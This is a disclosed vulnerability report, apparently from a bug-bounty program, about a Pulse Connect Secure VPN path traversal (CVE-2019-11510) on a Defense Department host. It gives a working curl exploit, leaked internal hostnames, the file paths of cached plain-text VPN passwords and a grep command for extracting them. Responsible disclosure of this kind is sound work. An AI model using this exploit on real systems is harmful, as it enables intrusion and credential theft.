U.S. Dept Of Defense: [CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc

Summary / Description:
█████ is vulnerable to Path Traversal which can lead to remote code execution.

Impact

Critical

Step-by-step Reproduction Instructions

1. Run the following cURL command to get the file /etc/hosts

curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'

## File generated by DSNet::Hosts::update at Thu Aug  1 13:24:40 2019

127.0.0.1	localhost
█████128.141	KMPC1_Node4
█████████252.82	acrcxznxx07d-10███
███████252.74	acrcxznxx06d-10███
███252.67	ODA-SCAN███
█████████252.65	ODA-VIP-1█████████
█████████252.63	ODA-1██████
███252.196	subversion████████
██████252.134	acrcxznxx07d-12██████
██████████252.13	ODA-2████
█████251.16	acdeva0xxb5l010███
████251.15	acdeva0xxb5l009████████
███████251.14	acdeva0xxb5l008████████
█████████250.239	devikrome█████
███████250.216	ws.soa██████
██████████250.192	ac0hxzndb01d-07.rsn.aac████
█████████250.16	devccimm███
██████250.112	devauth████████l devauth████████
████████250.104	ac0hxznap02d-03████████
███████1.235	spex████████
████1.205	auth████████
███1.164	internal████ internal███████
████1.142	ensq██████████ ensq█████
███████0.92	ac0hqa0xxa3b021.rsn.aac█████████
███0.55	g2g███
█████████0.177	Ac0hqa0xxa1b005.rsn.aac█████████
█████64.181	ac0hqsmap13p
████64.142	ac0hqsmxx03p
██████████40.237	emmggb████████
████████40.126	ac0hqapxx25p.rsn.aac████████
██████████221.42	gcrcknox gcrcknox████
█████████220.81	ft1ariss█████
██████220.245	ccimm█████████
██████220.150	ensqrtn████
███████220.145	pthensqtrain██████
██████212.9	acrcea0xxb5l035█████
██████212.64	acrcea0xxb5l034██████
███18.60	questcentral questcentral███
██████████163.35	hrcremedy█████
███████78.107	afrissimt.rs████
██████8.61	netscout███████
████████205.203	ac0hqa0xxb5l007█████
█████████205.202	ac0hqa0xxb5l006██████████
██████205.200	acrtna0xxb5l003█████
███146.8	AC0HQC2A0A3B021.RSN.AAC████████
█████████146.7	AC0HQC2A0A3B020.rsn.aac████████
█████████145.91	ac0hqwsxx04p.rsn.aac█████
█████145.149	caliber11.rsn.aac███████
████145.118	ac0hqwsap06p.rsn.aac██████████
██████144.95	ikrome████ ft1ikrome█████████
████144.91	Auth██████████
█████144.216	ac0hqc2a0a3b010.rsn.aac██████
████197.16	acft1a0xxb5l005███████
███197.15	acft1a0xxb5l004███
████196.62	ft1ccimm██████████
█████████196.28	ft1auth████
███████195.247	ac0hldbxx02t████
███195.246	ac0hldbxx01t█████
████195.195	ac0hxzndb04t-01████
██████195.188	ac0hxznap04t-03█████████
██████████195.158	ac0hxznxx24t-02██████
██████████195.133	ft1internal████████
████████195.127	ac0hxznap03t-03█████████
██████████194.78	ws13t.soa█████ ws14t.soa█████
█████████194.165	ft1ensq███ ac0hxznxx03t-08-ensq_wls1█████████
█████194.119	rmdwebtopft1███████

We can grab any other file on this system:

/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb

The VPN user and hashed passwords are stored in the mtmp/system file, but when users log into the application, it caches the plain-text password into dataa/data.mdb.

grep 'password@9' data.mdb -a

will get you a load of plain-text passwords

████████

Product, Version, and Configuration (If applicable)

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101

Suggested Mitigation/Remediation Actions

Update the Pulse Connect Secure VPN

Impact

Critical, an attacker can get code execution with this vulnerability.

References:

https://hackerone.com/reports/591295

Thanks,
Corben (@cdl)